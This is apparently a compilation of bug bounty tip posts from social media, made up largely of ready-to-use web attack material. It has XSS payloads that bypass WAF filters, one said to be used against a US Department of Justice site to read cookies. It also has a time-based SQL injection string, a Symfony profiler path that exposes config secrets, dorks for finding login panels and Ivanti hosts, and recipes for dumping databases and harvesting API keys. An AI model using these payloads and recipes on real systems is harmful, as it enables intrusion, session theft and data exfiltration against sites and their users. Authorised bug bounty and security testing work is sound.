*XSS* "></ : [filtered] <img> <iframe>tags : [filtered] "<> : [filtered] HTML entity: <a href=javascript:alert(1)>click : filtered (javascript:alert) : [filtered] Final payload: "aaa<a href=javas&#99;ript:alert(1)>click" 🫡🧙♂️ #bugbounty #xss
Bypassed strong Akamai WAF of USA Department of Justice payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
If you find web frameworks like Symfony, add '/app_dev.php/_profiler/open?file=app/config/parameters.yml' to the wordlist, and you may get juicy data. Enjoy! #bugbountytips #bugbountytip #cybersecurity #ethicalhacking
Two P3 after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. Payload: ⚙️ "%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e" credit: @nav1n0x #bugbountytips #BugBounty
Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite medium.com/@h4x0r_dz/2300… credit: @h4x0r_dz #bugbountytips #bugbounty
Acqhunt: An acquisition grabber in bug bounty hunting. Developed in Golang, it optimizes and elevates your bug hunting journey
The writeup is ready 📝 (Subdomain Fuzzing worth 35k bounty!) 💰 I tried my best to make everything clear, and useful ✨ Enjoy 😊 credit: @XHackerx007 #bugbountytips #Hacking medium.com/@HX007/subdoma…
Sql Injection Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z #bugbountytips #BugBounty #SqlInjection
I just published 0 Click Account TakeOver + Steal MFA Token and party! link.medium.com/jf4tCk9DiJb
I got a bounty too #bugbountytips
Don't forget to add Release.zip to your wordlist, you can't imagine what can happen. #BugBounty #SensitiveDataExposure
The Complete Ethical Hacking Course Beginner to Advanced... "🔐 Excited to announce 'The Complete Ethical Hacking Course - Beginner to Advanced'! 🚀 Uncover the secrets of cybersecurity, master penetration testing, and become a pro ethical hacker. 💻🛡️ Join the cybersecurity…
🤔Many people have often asked me how to search for "ivanti", for shodan you can search as title:"Ivanti Connect" hostname:"target.*" credit: @ynsmroztas #bugbountytip #bugbounty
Tips for JS file enum for endpoints / juicy info ... ** - download JS files of the target, e.g.: wget link_to_js ** - use beautifier.io to easily read JS file contents ** - I got extra endpoints to check for :) #bugbountytips
Finally I fixed the problem. Solution: I need to fuzz with a user agent, they block the ffuf UA: ffuf -u https://test/.com/FUZZ -w wordlist .txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Guys, why is it that when I fuzz some websites they don't give me any results, but I'm sure they should give me results for some paths I have already seen? There's no WAF in the application. What should I do, and why did this happen?
Check out my new blog post: Port Scanning for Bug Bounties buff.ly/44bQPC9 #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass buff.ly/4b1S5u0 Such a great read by: @pmnh_ & @UsmanMansha420 #bugbounty #hacking #cybersecurity #bugbountytips
I uploaded the template to a GitHub repo and will upload other templates when I create new ones github.com/rzizah/private…
Google Dork - Login Pages 🔑 inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels 👀
10 bsqli in 15 mins ⏳ and nearly 2 hours to dump data and confirm 1- I set up my bsqli payload using nuclei 2- used custom Google dorks for params, found success with it on the same program 3- gathered all links and ran my template on them 4- dumped the data using ghauri
Easy information disclosure 1- choose wide scope target 2- gather root domains 3- use gau or waymore > you can use --subs to also get subs 4- filter JS files and search for api_keys, you can use mantra or nuclei exposure temp #BugBounty #bugbountytips